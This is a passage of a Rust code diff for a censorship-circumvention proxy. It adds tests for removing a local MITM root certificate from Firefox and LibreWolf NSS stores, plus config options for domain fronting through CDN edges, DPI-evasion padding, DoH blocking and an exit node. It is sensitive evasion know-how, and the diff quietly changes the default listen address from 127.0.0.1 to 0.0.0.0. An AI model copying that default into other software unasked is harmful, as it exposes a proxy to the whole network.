+    fn rejects_empty_home_field() {
+        let line = "svcacct:x:999:999:gecos::/bin/false\n";
+        assert_eq!(sudo_parse_passwd_home(line), None);
+    }
+
+    #[test]
+    fn returns_first_matching_line_when_multiple() {
+        // getent only prints one line, but guard against future change.
+        let content = "liyon:x:1000:1000::/home/liyon:/bin/bash\n\
+                       other:x:1001:1001::/home/other:/bin/bash\n";
+        assert_eq!(sudo_parse_passwd_home(content), Some("/home/liyon".into()));
+    }
+
+    // ── NssReport::is_clean ──
+
+    #[test]
+    fn nss_report_is_clean_when_nothing_tried() {
+        let r = NssReport::default();
+        assert!(r.is_clean());
+    }
+
+    #[test]
+    fn nss_report_is_clean_when_all_attempts_succeeded() {
+        let r = NssReport {
+            tried: 3,
+            ok: 3,
+            tool_missing_with_stores_present: false,
+        };
+        assert!(r.is_clean());
+    }
+
+    #[test]
+    fn nss_report_not_clean_on_partial_failure() {
+        let r = NssReport {
+            tried: 3,
+            ok: 2,
+            tool_missing_with_stores_present: false,
+        };
+        assert!(!r.is_clean());
+    }
+
+    #[test]
+    fn nss_report_not_clean_when_tool_missing_with_stores() {
+        // Even with tried=0 (we couldn't try anything), the presence
+        // of NSS stores plus a missing tool means cleanup is NOT
+        // complete — callers should flag this to the user.
+        let r = NssReport {
+            tried: 0,
+            ok: 0,
+            tool_missing_with_stores_present: true,
+        };
+        assert!(!r.is_clean());
+    }
+
+    // ── is_nss_not_found ──
+
+    #[test]
+    fn nss_not_found_classifies_standard_not_found_message() {
+        // Typical NSS certutil output when the nickname is absent.
+        let stderr = "certutil: Could not find cert: MasterHttpRelayVPN\n";
+        assert!(is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_classifies_alt_wording_some_versions_emit() {
+        let stderr = "certutil: could not find a certificate named 'MasterHttpRelayVPN'\n";
+        assert!(is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_locked_database_error() {
+        // Regression guard for the critical bug: DB locked (Firefox
+        // running) must NOT be treated as "cert absent" — that would
+        // silently report clean revocation while NSS keeps trusting
+        // the stale root.
+        let stderr = "certutil: function failed: SEC_ERROR_LOCKED_DATABASE: \
+                      the certificate/key database is locked.\n";
+        assert!(!is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_bad_database_error() {
+        let stderr = "certutil: function failed: SEC_ERROR_BAD_DATABASE: \
+                      security library: bad database.\n";
+        assert!(!is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_permission_error() {
+        let stderr = "certutil: unable to open \"sql:/home/x/.mozilla/firefox/profile\" \
+                      (Permission denied)\n";
+        assert!(!is_nss_not_found(stderr));
+    }
+
+    #[test]
+    fn nss_not_found_rejects_empty_stderr() {
+        // An empty stderr with a non-zero exit is ambiguous — safer
+        // to classify as "not found is NOT proven", i.e. failure.
+        assert!(!is_nss_not_found(""));
+    }
+
+    // ── mozilla_family_profile_roots ──
+    //
+    // Regression guard for issue #1145: LibreWolf users hit
+    // MOZILLA_PKIX_ERROR_MITM_DETECTED on HSTS sites (bing.com,
+    // youtube.com) because the installer only scanned Firefox profile
+    // roots, never reaching LibreWolf's NSS DB. LibreWolf on Linux
+    // additionally migrated from `~/.librewolf` to XDG
+    // (`~/.config/librewolf/librewolf`) mid-project, and Flatpak
+    // installs redirect HOME inside the sandbox — both classes of
+    // install were silently missed by a first-pass legacy-only fix.
+    // These tests pin every layout so regressions can't sneak back.
+
+    #[test]
+    fn mozilla_roots_linux_covers_firefox_librewolf_flatpak_and_icecat() {
+        let roots = mozilla_family_profile_roots("linux", "/home/u", None, None);
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s.iter().any(|p| p == "/home/u/.mozilla/firefox"));
+        assert!(s
+            .iter()
+            .any(|p| p == "/home/u/snap/firefox/common/.mozilla/firefox"));
+        // LibreWolf legacy.
+        assert!(s.iter().any(|p| p == "/home/u/.librewolf"));
+        // LibreWolf XDG default (XDG_CONFIG_HOME unset → ~/.config).
+        assert!(s.iter().any(|p| p == "/home/u/.config/librewolf/librewolf"));
+        // LibreWolf Flatpak — both legacy and XDG layouts inside the sandbox.
+        assert!(s
+            .iter()
+            .any(|p| p == "/home/u/.var/app/io.gitlab.librewolf-community/.librewolf"));
+        assert!(s
+            .iter()
+            .any(|p| p
+                == "/home/u/.var/app/io.gitlab.librewolf-community/.config/librewolf/librewolf"));
+        // GNU IceCat (Trisquel / Parabola / Guix / Debian).
+        assert!(s.iter().any(|p| p == "/home/u/.mozilla/icecat"));
+    }
+
+    #[test]
+    fn mozilla_roots_linux_honors_xdg_config_home_override() {
+        // When XDG_CONFIG_HOME is set we must use it verbatim, not
+        // ~/.config. Pinned because a refactor that always defaulted
+        // would silently miss profiles for users who relocate their
+        // XDG config dir.
+        let roots = mozilla_family_profile_roots("linux", "/home/u", None, Some("/srv/xdg"));
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s.iter().any(|p| p == "/srv/xdg/librewolf/librewolf"));
+        // Default-derived path must NOT also be emitted when override
+        // is present — otherwise we double-scan a path that no longer
+        // exists for this user.
+        assert!(!s.iter().any(|p| p == "/home/u/.config/librewolf/librewolf"));
+    }
+
+    #[test]
+    fn mozilla_roots_linux_treats_empty_xdg_config_home_as_unset() {
+        // Per the XDG Base Directory spec, an empty value means
+        // "fall back to the default" — same as if the variable were
+        // unset entirely.
+        let roots = mozilla_family_profile_roots("linux", "/home/u", None, Some(""));
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s.iter().any(|p| p == "/home/u/.config/librewolf/librewolf"));
+    }
+
+    #[test]
+    fn mozilla_roots_macos_covers_firefox_and_librewolf() {
+        let roots = mozilla_family_profile_roots("macos", "/Users/u", None, None);
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s
+            .iter()
+            .any(|p| p == "/Users/u/Library/Application Support/Firefox/Profiles"));
+        assert!(s
+            .iter()
+            .any(|p| p == "/Users/u/Library/Application Support/LibreWolf/Profiles"));
+    }
+
+    #[test]
+    fn mozilla_roots_windows_covers_firefox_and_librewolf() {
+        let roots = mozilla_family_profile_roots(
+            "windows",
+            "ignored",
+            Some("C:\\Users\\u\\AppData\\Roaming"),
+            None,
+        );
+        let s: Vec<String> = roots.iter().map(|p| p.display().to_string()).collect();
+        assert!(s
+            .iter()
+            .any(|p| p == "C:\\Users\\u\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"));
+        assert!(s
+            .iter()
+            .any(|p| p == "C:\\Users\\u\\AppData\\Roaming\\LibreWolf\\Profiles"));
+    }
+
+    #[test]
+    fn mozilla_roots_windows_without_appdata_yields_nothing() {
+        // %APPDATA% can be missing in stripped CI / service contexts.
+        // Existing behaviour was to no-op; LibreWolf addition must not
+        // panic or fabricate a path from an empty string either.
+        let roots = mozilla_family_profile_roots("windows", "ignored", None, None);
+        assert!(roots.is_empty());
+    }
+
+    #[test]
+    fn mozilla_roots_unknown_os_is_empty() {
+        let roots = mozilla_family_profile_roots("freebsd", "/home/u", None, None);
+        assert!(roots.is_empty());
+    }
+
+    // ── discover_profile_dirs (cert-db filter) ──
+
+    fn touch(path: &Path) {
+        std::fs::write(path, b"").expect("write");
+    }
+
+    #[test]
+    fn discover_profile_dirs_picks_profiles_with_cert9_or_cert8() {
+        // Build a tempdir that mimics the real Mozilla profile layout
+        // and assert the filter accepts cert9.db (NSS sql:) and
+        // cert8.db (legacy dbm:) profiles, skips siblings that have
+        // neither, ignores plain files, and tolerates missing roots.
+        let tmp = std::env::temp_dir().join(format!(
+            "mhrv-discover-{}-{:x}",
+            std::process::id(),
+            std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .map(|d| d.as_nanos())
+                .unwrap_or(0)
+        ));
+        let _ = std::fs::remove_dir_all(&tmp);
+        std::fs::create_dir_all(&tmp).expect("mkdir tmp");
+
+        let with_cert9 = tmp.join("abc.default");
+        let with_cert8 = tmp.join("legacy.profile");
+        let without_db = tmp.join("not-a-profile");
+        let stray_file = tmp.join("profiles.ini");
+        std::fs::create_dir_all(&with_cert9).unwrap();
+        std::fs::create_dir_all(&with_cert8).unwrap();
+        std::fs::create_dir_all(&without_db).unwrap();
+        touch(&with_cert9.join("cert9.db"));
+        touch(&with_cert8.join("cert8.db"));
+        touch(&stray_file);
+
+        let missing_root = tmp.join("does-not-exist");
+        let got = discover_profile_dirs(&[tmp.clone(), missing_root]);
+
+        let names: std::collections::HashSet<_> = got
+            .iter()
+            .map(|p| p.file_name().unwrap().to_string_lossy().into_owned())
+            .collect();
+        assert!(names.contains("abc.default"));
+        assert!(names.contains("legacy.profile"));
+        assert!(!names.contains("not-a-profile"));
+        assert!(!names.contains("profiles.ini"));
+
+        let _ = std::fs::remove_dir_all(&tmp);
+    }
 }
diff --git a/src/config.rs b/src/config.rs
index 74d08155..d4251aa8 100644
--- a/src/config.rs
+++ b/src/config.rs
@@ -1,4 +1,5 @@
-use serde::Deserialize;
+use rustls::pki_types::ServerName;
+use serde::{Deserialize, Serialize};
 use std::collections::HashMap;
 use std::path::Path;
 
@@ -14,14 +15,19 @@ pub enum ConfigError {
 
 /// Operating mode. `AppsScript` is the full client — MITMs TLS locally and
 /// relays HTTP/HTTPS through a user-deployed Apps Script endpoint.
-/// `GoogleOnly` is a bootstrap: no relay, no Apps Script config needed,
-/// only the SNI-rewrite tunnel to the Google edge is active. Intended for
-/// users who need to reach `script.google.com` to deploy `Code.gs` in the
-/// first place.
+/// `Direct` runs without any Apps Script relay: only the SNI-rewrite tunnel
+/// is active, targeting the Google edge by default plus any user-configured
+/// `fronting_groups`. Originally introduced as a `script.google.com`
+/// bootstrap (when this mode could only reach Google's edge it was named
+/// `google_only`), now generalized to any user-configured CDN edge.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub enum Mode {
     AppsScript,
-    GoogleOnly,
+    /// Was named `GoogleOnly` before v1.9 and the introduction of
+    /// `fronting_groups`. The string `"google_only"` is still accepted
+    /// in `mode_kind()` as a deprecated alias so existing configs do
+    /// not break.
+    Direct,
     Full,
 }
 
@@ -29,7 +35,7 @@ impl Mode {
     pub fn as_str(self) -> &'static str {
         match self {
             Mode::AppsScript => "apps_script",
-            Mode::GoogleOnly => "google_only",
+            Mode::Direct => "direct",
             Mode::Full => "full",
         }
     }
@@ -96,6 +102,14 @@ pub struct Config {
     /// script IDs.
     #[serde(default)]
     pub parallel_relay: u8,
+    /// Adaptive batch coalesce: after each op arrives, wait this many ms
+    /// for more ops before firing the batch. Resets on every arrival.
+    /// 0 = use compiled default (10ms).
+    #[serde(default)]
+    pub coalesce_step_ms: u16,
+    /// Hard cap on total coalesce wait (ms). 0 = use compiled default (1000ms).
+    #[serde(default)]
+    pub coalesce_max_ms: u16,
     /// Optional explicit SNI rotation pool for outbound TLS to `google_ip`.
     /// Empty / missing = auto-expand from `front_domain` (current default of
     /// {www, mail, drive, docs, calendar}.google.com). Set to an explicit list
@@ -163,6 +177,315 @@ pub struct Config {
     /// Issues #39, #127.
     #[serde(default)]
     pub passthrough_hosts: Vec<String>,
+
+    /// Block STUN/TURN UDP ports (3478, 5349, 19302) at the SOCKS5 listener.
+    /// Forces WebRTC apps (Google Meet, Discord, WhatsApp) to fall back to
+    /// TCP TURN on port 443, skipping the 10-30s UDP ICE timeout. Default
+    /// true — TCP fallback works for all tested apps and connects instantly.
+    #[serde(default = "default_block_stun")]
+    pub block_stun: bool,
+
+    /// Block outbound QUIC (UDP/443) at the SOCKS5 listener.
+    ///
+    /// QUIC is HTTP/3-over-UDP. In `apps_script` mode it's hopeless —
+    /// Apps Script is HTTP-only, so QUIC datagrams either get refused
+    /// outright (UDP ASSOCIATE rejected) or silently fall through to
+    /// `raw-tcp direct` and fail in interesting ways. In `full` mode
+    /// the tunnel-node CAN carry UDP, but QUIC's congestion control
+    /// stacked on top of TCP-encapsulated transport produces TCP
+    /// meltdown for any non-trivial bandwidth — browsers see <1 Mbps
+    /// where the same site over plain HTTPS would do >50.
+    ///
+    /// With `block_quic = true`, the SOCKS5 UDP relay drops any
+    /// datagram destined for port 443 (silent UDP — caller's stack
+    /// retries a few times then falls back). Browsers then re-issue
+    /// the same request as TCP/HTTPS through the regular CONNECT
+    /// path, which goes through the relay normally.
+    ///
+    /// Why this is a switch rather than hard-wired: for users on Full
+    /// mode + udpgw (a recent path; v1.7.0+) the QUIC TCP-meltdown
+    /// is partially mitigated by udpgw's persistent-socket reuse,
+    /// and a tiny minority of sites only support HTTP/3 (rare). The
+    /// flag defaults to `true` (see `default_block_quic`); set
+    /// `block_quic: false` to let QUIC through when peak speed
+    /// matters more than consistency. Issue #213.
+    #[serde(default = "default_block_quic")]
+    pub block_quic: bool,
+    /// When true, suppress the random `_pad` field that v1.8.0+ adds
+    /// to outbound Apps Script requests for DPI evasion. Default off
+    /// (padding active). Some users on heavily-throttled ISPs find
+    /// the +25% bandwidth cost from padding compounds with the
+    /// throttle to push borderline-working batches into timeouts;
+    /// turning padding off recovers a bit of headroom at the cost of
+    /// length-distribution defense against DPI fingerprinting. Issue
+    /// #391 (EBRAHIM-AM).
+    ///
+    /// Don't flip this on speculatively — for users where Apps Script
+    /// outbound is uncongested, padding is free DPI defense. Only
+    /// turn off if you've measured throughput improvement after the
+    /// flip on your specific ISP path.
+    #[serde(default)]
+    pub disable_padding: bool,
+
+    /// Disable HTTP/2 multiplexing on the Apps Script relay leg.
+    /// Default `false` (= h2 enabled): the TLS handshake to the Google
+    /// edge advertises ALPN `["h2", "http/1.1"]`; if the server picks
+    /// h2 we route all relay traffic over a single multiplexed
+    /// connection (~100 concurrent streams) instead of the legacy
+    /// per-request TLS pool of 8-80 sockets. Kills head-of-line
+    /// blocking on slow Apps Script responses (one stalled call no
+    /// longer pins a whole socket). Set to `true` to force the
+    /// pre-v1.9.x HTTP/1.1 path — useful as a kill switch if a specific
+    /// deployment, fronting domain, or middlebox refuses h2.
+    #[serde(default)]
+    pub force_http1: bool,
+
+    /// Controls the DoH bypass. Default `true` (= bypass off, DoH stays
+    /// inside the tunnel). When `false` (= bypass active), CONNECTs to
+    /// well-known DoH hostnames (Cloudflare, Google, Quad9, AdGuard,
+    /// NextDNS, OpenDNS, browser-pinned variants like
+    /// `chrome.cloudflare-dns.com` and `mozilla.cloudflare-dns.com`)
+    /// skip the Apps Script tunnel and exit via plain TCP (or
+    /// `upstream_socks5` if set). DoH already encrypts the queries
+    /// themselves, so the only privacy property the tunnel adds is
+    /// hiding *the fact that you're doing DoH* from the local network,
+    /// at a cost of a ~2 s Apps Script round-trip on every name lookup.
+    /// In Full mode this was the dominant DNS slowdown source.
+    ///
+    /// Set `tunnel_doh: false` to enable the bypass and let DoH go
+    /// direct (saves the ~2 s Apps Script round-trip per name on
+    /// networks where the DoH endpoints are reachable). With the
+    /// bypass off, browsers that find their pinned DoH host
+    /// unreachable already fall back to OS DNS on their own, so
+    /// failure modes are graceful in either direction.
+    ///
+    /// **Default flipped to `true` in v1.9.0** (issue #468). The
+    /// previous default (`false` = bypass active) silently broke for
+    /// Iranian users because Iran ISPs filter direct connections to
+    /// `dns.google`, `chrome.cloudflare-dns.com`, etc. — exactly the
+    /// "pinned DoH" hosts that the bypass was sending through. The
+    /// safe default keeps DoH inside the tunnel; users on networks
+    /// where direct DoH works can opt back into the bypass.
+    ///
+    /// Port-gated to TCP/443 only. A private DoH on a non-standard port
+    /// (e.g. `doh.internal.example:8443`) won't take the bypass path —
+    /// list it in `passthrough_hosts` instead, which has no port gate.
+    #[serde(default = "default_tunnel_doh")]
+    pub tunnel_doh: bool,
+
+    /// Extra hostnames to treat as DoH endpoints in addition to the
+    /// built-in default list. Case-insensitive; entries match exactly
+    /// OR as a dot-anchored suffix unconditionally — `doh.acme.test`
+    /// covers both `doh.acme.test` and `tenant.doh.acme.test`. (Unlike
+    /// `passthrough_hosts`, no leading dot is required for suffix
+    /// matching: every legitimate subdomain of a DoH host is itself
+    /// a DoH endpoint, so the leading-dot convention would be a
+    /// footgun.) Use this to cover private/enterprise DoH resolvers
+    /// without waiting for a release.
+    ///
+    /// Inert when `tunnel_doh = true` — the bypass itself is off, so
+    /// the extras have nothing to feed. The proxy logs a warning at
+    /// startup if both are set together.
+    #[serde(default)]
+    pub bypass_doh_hosts: Vec<String>,
+
+    /// When true, immediately reject (close) any CONNECT to a known DoH
+    /// endpoint. Takes priority over `tunnel_doh` — the connection is
+    /// never established in either direction. Browsers fall back to system
+    /// DNS, which tun2proxy handles via virtual DNS (instant, no tunnel
+    /// round-trip). This eliminates the ~1.5s per-domain DoH overhead
+    /// that #468's `tunnel_doh: true` default introduced.
+    ///
+    /// Background: #468 changed `tunnel_doh` from false (bypass) to true
+    /// (tunnel) because Iranian ISPs block direct DoH endpoints. But
+    /// tunneling DoH costs an extra ~1.5s Apps Script round-trip per DNS
+    /// lookup, which made every page load noticeably slower. Blocking
+    /// DoH entirely avoids both problems: no ISP-visible DoH connection,
+    /// no tunnel round-trip — browsers use the system DNS path instead.
+    ///
+    /// Default `true` (NOT `bool::default() = false`). Critical for
+    /// upgrading users — see #773: with the v1.9.13 default-derive bug,
+    /// existing configs got `block_doh = false` paired with `tunnel_doh
+    /// = true` (the new tunnel-DoH default from #468), routing every
+    /// browser DNS lookup through Apps Script and adding ~1.5s per page
+    /// load. The named-default function fixes the upgrade path so the
+    /// fast block-then-system-DNS behaviour is what users actually get.
+    #[serde(default = "default_block_doh")]
+    pub block_doh: bool,
+
+    /// Multi-edge domain-fronting groups. Each group is a triple of
+    /// (edge IP, front SNI, member domains): when a CONNECT to one of
+    /// the member domains arrives, the proxy MITMs at the local CA
+    /// then re-encrypts upstream against `ip` with `sni` as the TLS
+    /// SNI — same trick we already do for `google_ip` + `front_domain`,
+    /// but generalised so users can target Vercel's edge (sni=react.dev,
+    /// fronting vercel.com / vercel.app / nextjs.org / ...) or Fastly's
+    /// (sni=www.python.org, fronting reddit.com / githubassets.com / ...)
+    /// directly without burning Apps Script quota or relying on the
+    /// Google edge for non-Google traffic.
+    ///
+    /// The cert returned by the upstream is validated against `sni` by
+    /// rustls as normal — no custom SAN-allowlist needed, the front SNI
+    /// must itself be a real domain hosted by the same edge as the
+    /// targets. Picking the right (ip, sni) pair is on the user; see
+    /// `docs/fronting-groups.md` for the recipe.
+    ///
+    /// Group match wins over the built-in Google SNI-rewrite suffix list
+    /// but loses to `passthrough_hosts` (explicit user opt-out wins) and
+    /// to the DoH bypass. Empty / missing = feature off.
+    #[serde(default)]
+    pub fronting_groups: Vec<FrontingGroup>,
+
+    /// Auto-blacklist tuning — how many timeouts within the window
+    /// trip a per-deployment cooldown.
+    ///
+    /// Default `3` matches the historical behavior. Single-deployment
+    /// users who hit transient network blips have reported (#391, #444)
+    /// that 3 strikes are too few — one cold-start stall plus two
+    /// network glitches lock out their only relay path. Bumping to
+    /// `5` or `6` is a reasonable workaround for that case.
+    ///
+    /// Multi-deployment users with 10+ healthy alternatives can lower
+    /// this (e.g. `2`) to fail-fast off a flaky deployment without
+    /// burning latency on retries.
+    #[serde(default = "default_auto_blacklist_strikes")]
+    pub auto_blacklist_strikes: u32,
+
+    /// Window (seconds) for the auto-blacklist strike counter. Strikes
+    /// older than this are dropped. Default `30`. Larger windows make
+    /// the heuristic less twitchy at the cost of holding state longer
+    /// for deployments that have already recovered.
+    #[serde(default = "default_auto_blacklist_window_secs")]
+    pub auto_blacklist_window_secs: u64,
+
+    /// Cooldown (seconds) when the strike threshold trips. Default
+    /// `120`. Single-deployment users who can't afford a 2-min lockout
+    /// when their only relay misbehaves can drop to `30` or `60`. Multi-
+    /// deployment users with healthy alternatives can extend to `600`
+    /// to keep a known-bad deployment out of rotation longer.
+    #[serde(default = "default_auto_blacklist_cooldown_secs")]
+    pub auto_blacklist_cooldown_secs: u64,
+
+    /// Per-batch HTTP round-trip timeout (seconds). Default `30` —
+    /// matches Apps Script's typical response cliff and historical
+    /// `BATCH_TIMEOUT` constant. Slow Iran ISP networks may want `45`
+    /// or `60` to give Apps Script time to respond past throttle
+    /// windows. Networks with fail-fast preference may want `15` to
+    /// retry sooner when a deployment hangs. Floor `5`, ceiling `300`
+    /// (anything beyond exceeds Apps Script's hard 6-min cap with
+    /// no benefit).
+    #[serde(default = "default_request_timeout_secs")]
+    pub request_timeout_secs: u64,
+
+    /// Optional second-hop exit node, for sites that block traffic
+    /// from Google datacenter IPs (Apps Script's outbound IP space).
+    /// Most visibly: Cloudflare-fronted services that flag the GCP IP
+    /// block as bots — ChatGPT (chatgpt.com), Claude (claude.ai),
+    /// Grok (grok.com / x.com), and a long tail of CF-protected SaaS.
+    ///
+    /// Architecture: chain becomes
+    ///   `client → SNI rewrite → Apps Script (Google IP) → exit node
+    ///    (Deno Deploy / fly.io / etc., non-Google IP) → destination`
+    ///
+    /// The destination sees the exit node's outbound IP, not Google's.
+    /// CF anti-bot's "this is a Google datacenter" heuristic doesn't
+    /// fire. mhrv-rs's DPI cover (Iran ISP only sees the SNI-rewritten
+    /// TLS to a Google IP) is unchanged — the second hop happens
+    /// inside Apps Script, invisible from the user's network.
+    ///
+    /// Setup walkthrough at `assets/exit_node/README.md`. Default off.
+    #[serde(default)]
+    pub exit_node: ExitNodeConfig,
+}
+
+/// Configuration for the optional second-hop exit node.
+#[derive(Debug, Clone, Default, Deserialize, Serialize)]
+pub struct ExitNodeConfig {
+    /// Master switch. Default false. Even with `relay_url` and `psk`
+    /// set, nothing routes through the exit node unless this is true.
+    #[serde(default)]
+    pub enabled: bool,
+
+    /// HTTPS URL of the exit-node endpoint. Typically a Deno Deploy /
+    /// fly.io serverless deployment (or your own VPS) running the
+    /// `assets/exit_node/exit_node.ts` script (or an equivalent). The
+    /// exit node is what makes the outbound `fetch()` call to the
+    /// destination, so its IP is what the destination sees.
+    #[serde(default)]
+    pub relay_url: String,
+
+    /// Pre-shared key — must match the `PSK` constant in the exit-node
+    /// script. Without a matching PSK the exit node refuses the request
+    /// (401). The PSK is what keeps the exit node from being usable as
+    /// an open proxy by anyone who learns its URL. Treat like a
+    /// password: do not commit, rotate if leaked. Generate with
+    /// `openssl rand -hex 32`.
+    #[serde(default)]
+    pub psk: String,
+
+    /// `"selective"` (default): only hosts in `hosts` go through the
+    /// exit node; everything else takes the regular Apps Script path.
+    /// Recommended — the exit-node hop adds ~200-500 ms per request,
+    /// so reserve it for sites that need a non-Google IP.
+    ///
+    /// `"full"`: every request goes through the exit node. Useful only
+    /// when the entire workload is CF-anti-bot affected, or when the
+    /// exit node happens to be faster than Apps Script alone for the
+    /// user's network path (rare but possible on very slow ISPs).
+    #[serde(default = "default_exit_node_mode")]
+    pub mode: String,
+
+    /// In `"selective"` mode, the list of destination hostnames that
+    /// route through the exit node. Matches exactly OR as a
+    /// dot-anchored suffix, mirroring `passthrough_hosts` semantics:
+    /// `"chatgpt.com"` covers `chatgpt.com` and `api.chatgpt.com` and
+    /// `auth.chatgpt.com` etc. Leading dots are stripped at load.
+    ///
+    /// The recurring CF-anti-bot list from community reports:
+    /// `chatgpt.com`, `claude.ai`, `x.com`, `grok.com`. Extend for
+    /// any other CF-blocked sites you need.
+    #[serde(default)]
+    pub hosts: Vec<String>,
+}
+
+fn default_exit_node_mode() -> String {
+    "selective".into()
+}
+
+/// One multi-edge fronting group. Edge CDNs like Vercel and Fastly
+/// host hundreds of tenants behind a single set of edge IPs and use
+/// the inner HTTP `Host` header (after TLS handshake) to dispatch to
+/// the right backend. Pick one neutral domain hosted on that edge to
+/// use as `sni`; the cert it serves will be valid for that name (rustls
+/// validates against `sni`, not against the inner `Host`), and the
+/// edge will route based on the `Host` header.
+#[derive(Debug, Clone, Deserialize, Serialize)]
+pub struct FrontingGroup {
+    /// Human-readable name used in log lines. Free-form; uniqueness not
+    /// enforced but recommended.
+    pub name: String,
+    /// Edge IP to dial. A single IP for now — most edges have many but
+    /// one is enough to validate the technique. IP rotation per-group
+    /// can come later.
+    pub ip: String,
+    /// SNI to send on the outbound TLS handshake. Must be a real domain
+    /// served by the same edge as `domains`, otherwise the edge will
+    /// either refuse the handshake or serve a default page that 404s
+    /// the inner Host. Examples: `react.dev` for Vercel, `www.python.org`
+    /// for Fastly.
+    pub sni: String,
+    /// Member domain list. Matching is case-insensitive: an entry
+    /// matches the host exactly OR as an unconditional dot-anchored
+    /// suffix (`vercel.com` matches `app.vercel.com` too). Same shape
+    /// as the DoH host list.
+    ///
+    /// Canonical form for matching is lowercase and trailing-dot
+    /// trimmed; entries are normalized to that form once at proxy
+    /// startup. The on-disk representation is preserved as written
+    /// (we don't mutate the user's config), so `Vercel.com.` and
+    /// `vercel.com` both work — the matcher is the source of truth
+    /// for equality.
+    pub domains: Vec<String>,
 }
 
 fn default_fetch_ips_from_api() -> bool { false }
@@ -170,6 +493,42 @@ fn default_max_ips_to_scan() -> usize { 100 }
 fn default_scan_batch_size() -> usize {500}
 fn default_google_ip_validation() -> bool {true}
 
+/// Default for `tunnel_doh`: `true` (DoH stays inside the tunnel).
+/// Flipped from `false` in v1.9.0 per #468 — Iran ISPs filter direct
+/// connections to pinned DoH hosts (`dns.google`, `chrome.cloudflare-dns.com`,
+/// …) and the prior bypass-on default silently broke DNS for the
+/// dominant userbase. Users on networks where direct DoH works can
+/// opt back in with `tunnel_doh: false`.
+fn default_tunnel_doh() -> bool { true }
+
+/// Defaults for `block_stun` and `block_quic`: both `true`. QUIC over the
+/// TCP-based tunnel causes TCP-over-TCP meltdown (<1 Mbps); browsers fall
+/// back to HTTPS/TCP within seconds of the silent UDP drop. Issue #793.
+fn default_block_stun() -> bool { true }
+fn default_block_quic() -> bool { true }
+
+/// Default for `block_doh`: `true` (browser DoH is rejected so the
+/// browser falls back to system DNS, which `tun2proxy` resolves
+/// instantly via virtual DNS — saves the ~1.5s tunnel round-trip per
+/// name lookup that #468's `tunnel_doh: true` default would otherwise
+/// pay). #773 — without this named-default function, `#[serde(default)]`
+/// on `bool` resolves to `false`, and existing configs upgrading to
+/// v1.9.13 silently lost the block-and-fall-back behaviour, paying
+/// the full DoH-via-Apps-Script penalty on every page load. Power
+/// users who specifically want browser DoH (with the latency cost)
+/// can opt back in by setting `block_doh: false`.
+fn default_block_doh() -> bool { true }
+
+/// Defaults for the auto-blacklist tuning knobs (#391, #444). These
+/// preserve historical behavior — `3 strikes / 30s window / 120s cooldown`.
+fn default_auto_blacklist_strikes() -> u32 { 3 }
+fn default_auto_blacklist_window_secs() -> u64 { 30 }
+fn default_auto_blacklist_cooldown_secs() -> u64 { 120 }
+
+/// Default for `request_timeout_secs`: 30s, matching the historical
+/// hard-coded `BATCH_TIMEOUT` and Apps Script's typical response cliff.
+fn default_request_timeout_secs() -> u64 { 30 }
+
 fn default_google_ip() -> String {
     "216.239.38.120".into()
 }
@@ -177,7 +536,7 @@ fn default_front_domain() -> String {
     "www.google.com".into()
 }
 fn default_listen_host() -> String {
-    "127.0.0.1".into()
+    "0.0.0.0".into()
 }
 fn default_listen_port() -> u16 {
     8085
@@ -226,9 +585,52 @@ impl Config {
             ));
         }
         if self.socks5_port == Some(self.listen_port) {
-            return Err(ConfigError::Invalid(
-                "listen_port and socks5_port must be different".into(),
-            ));
+            return Err(ConfigError::Invalid(format!(
+                "listen_port and socks5_port must differ on the same host \
+                 (both set to {} on {}). Change one of them in config.json.",
+                self.listen_port, self.listen_host
+            )));
+        }
+        for (i, g) in self.fronting_groups.iter().enumerate() {
+            if g.name.trim().is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}]: name is empty", i
+                )));
+            }
+            if g.ip.trim().is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): ip is empty", i, g.name
+                )));
+            }
+            if g.sni.trim().is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): sni is empty", i, g.name
+                )));
+            }
+            // Parse the SNI here so an invalid hostname fails the same
+            // load path the UI / `mhrv-rs` CLI both use, rather than
+            // surfacing later only when ProxyServer::new tries to build
+            // the TLS server name. Same fail-fast contract as the rest
+            // of validate(). The parse is cheap; runtime path repeats
+            // it once at proxy startup, idempotently.
+            if let Err(e) = ServerName::try_from(g.sni.clone()) {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): invalid sni '{}': {}",
+                    i, g.name, g.sni, e
+                )));
+            }
+            if g.domains.is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): domains list is empty", i, g.name
+                )));
+            }
+            for d in &g.domains {
+                if d.trim().is_empty() {
+                    return Err(ConfigError::Invalid(format!(
+                        "fronting_groups[{}] ('{}'): empty domain entry", i, g.name
+                    )));
+                }
+            }
         }
         Ok(())
     }
@@ -236,10 +638,15 @@ impl Config {
     pub fn mode_kind(&self) -> Result<Mode, ConfigError> {
         match self.mode.as_str() {
             "apps_script" => Ok(Mode::AppsScript),
-            "google_only" => Ok(Mode::GoogleOnly),
+            "direct" => Ok(Mode::Direct),
+            // Deprecated alias. `google_only` was the name of `direct`
+            // before fronting_groups generalized the mode beyond
+            // Google's edge. Accepted forever so old configs keep
+            // working — the UI rewrites it on next save.
+            "google_only" => Ok(Mode::Direct),
             "full" => Ok(Mode::Full),
             other => Err(ConfigError::Invalid(format!(
-                "unknown mode '{}' (expected 'apps_script', 'google_only', or 'full')",
+                "unknown mode '{}' (expected 'apps_script', 'direct', or 'full')",
                 other
             ))),
         }
@@ -306,24 +713,36 @@ mod tests {
     }
 
     #[test]
-    fn parses_google_only_without_script_id() {
-        // Bootstrap mode: no script_id, no auth_key — both are only meaningful
+    fn parses_direct_without_script_id() {
